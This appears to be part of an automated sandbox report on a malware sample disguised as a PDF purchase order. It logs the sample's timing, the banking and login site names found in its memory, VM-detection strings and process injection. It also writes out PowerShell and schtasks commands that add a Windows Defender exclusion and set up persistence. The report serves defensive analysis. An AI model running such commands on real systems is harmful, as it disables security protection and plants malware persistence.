Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 599470
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 599344
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 599218
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 599109
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 599000
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 598890
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 598781
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 598672
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 598562
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 598452
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 598343
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 598234
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 598125
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 598015
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 597906
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 597792
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 597687
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 597577
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 597434
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 597327
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 597218
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 597108
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 597000
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 596890
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 596781
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 596672
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 596562
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 596451
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 596343
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 596234
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 596125
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 596015
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 595906
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 595784
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 595656
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 595546
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 595431
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 595304
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 595172
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 594994
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 594875
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 594765
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 594656
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 594546
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 594437
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Thread delayed: delay time: 594326

Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3881029475.0000000001588000.00000004.00000020.00020000.00000000.sdmp, QeSBxb.exe, 0000000D.00000002.3880662721.0000000001068000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000001.00000002.1459392032.0000000001621000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: QeSBxb.exe, 0000000D.00000002.3892287953.0000000004200000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h

Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Code function: 8_2_05C69548 LdrInitializeThunk,

8_2_05C69548

Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QeSBxb.exe"
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QeSBxb.exe"			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Memory written: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QeSBxb.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QeSBxb" /XML "C:\Users\user\AppData\Local\Temp\tmpC1CB.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process created: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process created: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QeSBxb" /XML "C:\Users\user\AppData\Local\Temp\tmpD080.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process created: C:\Users\user\AppData\Roaming\QeSBxb.exe "C:\Users\user\AppData\Roaming\QeSBxb.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Queries volume information: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Queries volume information: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe VolumeInformation	Jump to behavior
